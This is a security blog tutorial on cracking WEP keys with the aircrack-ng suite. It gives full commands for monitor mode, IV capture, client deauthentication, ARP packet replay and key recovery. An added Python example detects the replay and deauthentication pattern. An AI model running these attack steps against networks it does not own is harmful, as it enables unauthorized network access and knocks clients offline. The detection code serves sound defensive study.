WEP Cracking with aircrack

 

  1. Finding the target
  2. Capture packets from target (IVs)
  3. Cracking WEP

1. Finding the target

The first step is to find our target. Ensure that our target uses WEP Encryption and that you can get a good signal.

Commands

  • airmon-ng start wifi0 // Put your card into monitor mode
  • airodump-ng ath1 // Start monitoring and find your target (note the target's channel, 11 in this example)



2. Capture packets from target (IVs)

Now we are ready to start sniffing IVs from the specific target. The best way is to find a valid packet for the specific access point and keep replaying that packet, so that we collect IVs easily.

Commands

  • airodump-ng --channel 11 --write out --ivs ath1 // Sniff IVs on channel 11 (you can also restrict this to a specific access point)
  • aireplay-ng -2 -b 00:11:50:FB:22:20 -d ff:ff:ff:ff:ff:ff -m 68 -n 68 -p 0841 -h 00:13:02:10:2A:C9 ath1 // Reads packets until it finds a valid one to replay
  • aireplay-ng -0 1 -a 00:11:50:FB:22:20 -c 00:13:02:10:2A:C9 ath1 // Helps the previous command find a valid packet by forcing the client to reconnect to the access point
  • Press 'y' at the prompt of the second command (aireplay-ng -2) so it uses the valid packet and starts replaying it against the access point


3. Cracking WEP

After some time, once you have collected enough IVs (500.000 to 1.000.000 for WEP 128), you can start trying to crack the WEP key.

Commands

  • aircrack-ng -f 2 -a 1 -b 00:11:50:FB:22:20 -n 128 out-02.ivs // Try to crack the WEP 128 key for the specified access point
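
What the traffic from step 2 looks like from the monitoring side, as an added example that is not part of the original post: a deauthentication of a client followed by a flood of identical-length (68-byte) broadcast data frames from that client's MAC. The frame-record tuple layout, the thresholds and the second station's MAC are assumptions made for the example.

```python
from collections import defaultdict, deque

BROADCAST = "ff:ff:ff:ff:ff:ff"

def detect_replay(frames, window=1.0, threshold=50, deauth_gap=60.0):
    """Flag stations flooding a BSSID with same-length broadcast data frames.

    frames: (ts, kind, src, dst, bssid, length) tuples sorted by ts; this
    record layout is an assumption for the example, not a tool's format.
    """
    recent = defaultdict(deque)   # (src, bssid, length) -> timestamps in window
    last_deauth = {}              # (bssid, client) -> time of last deauth
    alerted, alerts = set(), []
    for ts, kind, src, dst, bssid, length in frames:
        if kind == "deauth":
            last_deauth[(bssid, dst)] = ts
            continue
        if kind != "data" or dst != BROADCAST:
            continue
        key = (src, bssid, length)
        q = recent[key]
        q.append(ts)
        while ts - q[0] > window:          # drop timestamps outside the window
            q.popleft()
        if len(q) >= threshold and key not in alerted:
            alerted.add(key)
            seen = last_deauth.get((bssid, src))
            alerts.append({
                "station": src, "bssid": bssid, "frame_len": length,
                "frames_in_window": len(q),
                # a deauth of the same client shortly before strengthens the signal
                "deauth_before": seen is not None and ts - seen <= deauth_gap,
            })
    return alerts

# Constructed sample (MACs reused from the commands above, lower-cased).
AP, STA = "00:11:50:fb:22:20", "00:13:02:10:2a:c9"
SAMPLE = [(0.0, "deauth", AP, STA, AP, 26)]
SAMPLE += [(1.0 + i * 0.002, "data", STA, BROADCAST, AP, 68) for i in range(300)]
SAMPLE += [(5.0 + i, "data", "02:00:00:00:00:01", BROADCAST, AP, 68) for i in range(5)]

if __name__ == "__main__":
    for alert in detect_replay(SAMPLE):
        print(alert)
```

The window and threshold values are starting points to tune against the normal broadcast rate on the monitored network.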


root

June 23rd



© 2018 SuRGeoNix | Security Blog